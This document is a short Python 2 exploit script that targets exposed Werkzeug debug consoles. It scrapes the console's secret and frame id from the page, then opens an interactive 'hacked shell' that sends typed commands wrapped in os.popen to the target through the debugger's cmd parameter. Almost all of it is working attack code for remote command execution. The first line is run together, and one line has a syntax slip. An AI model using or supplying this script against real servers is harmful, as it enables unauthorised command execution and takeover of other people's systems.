import sysimport requestsimport reimport urllibfrom bs4 import Beautiful

1. import sys
2. import requests
3. import re
4. import urllib
5. from bs4 import BeautifulSoup
6.  
7.  
8. def usage():
9.     print "\nThis is a simple program to Exploit Werkzeug"
10.     print "\nusage: python Werkzeug.py http://www.example.com/path/to/console\n"
11.  
12. # Checks that an additional argument is supplied
13. if len(sys.argv) != 2:
14.     usage()
15.     sys.exit(-1)
16.  
17. # Setting static variables
18. url = sys.argv[1]
19.  
20. __debugger__ = 'yes'
21.  
22.  
23. #getting response to parse for secret & frm
24. response = requests.get(url)
25.  
26. # Finding the secret and frm key from the response.text
27. secret = re.findall("[0-9a-zA-Z]{20}",response.text)
28. frm = re.findall("[0-9]{15}",response.text)
29.  
30. # Sanity check for frm and secret strings
31. if len(secret) != 1:
32.     print "[-] Unable to find secret"
33.     sys.exit(-1)
34. elif len(frm) == 0:
35.     print "[!] Unable to find frm"
36.     print "[!] Defaulting frm to 0"
37.     frm = '0'
38. else:
39.     #If everything correct, set secret to first instance found and frm to second
40.     secret = secret[0]
41.     frm = frm[1]
42.     print "[+] Secret found: " + str(secret)
43.     print "[+] Frm found: " + str(frm)
44.  
45. # Getting response for werkzeug sanity check
46. response = requests.get(url)
47.  
48. # Sanity check on debug werkzeug console
49. if "Werkzeug powered traceback interpreter" not in response.text:
50.     print "[-] Debug not enabled"
51.     sys.exit(-1)
52.  
53.  
54. print ("[+] starting hacked shell on " + url)
55. print ("[+] use Ctrl + C to kill shell")
56.  
57.  
58. # Start of while loop hacked shell
59. while(1):
60.  
61.     #Getting user raw input to implement commands
62.     shell_cmd = raw_input("#:")
63.     cmd = ('''__import__('os').popen('%s').read();''' % shell_cmd) #setting the cmd with user supplied input
64.  
65.     #response to be sent to werkzeug debug console
66.     response = requests.get("%s?__debugger__=yes&cmd=%s&frm=%s&s=%s"% (url, urllib.quote_plus(cmd), frm, secret))
67.  
68.     #Remove the HTML tags
69.     out = BeautifulSoup(response.text, "html.parser")get_text()
70.  
71.     #Server's response Debug information
72.     print "[+] Response from server"
73.     print "[+] Status code: " + str(response.status_code)
74.     print "[+] Response: " + out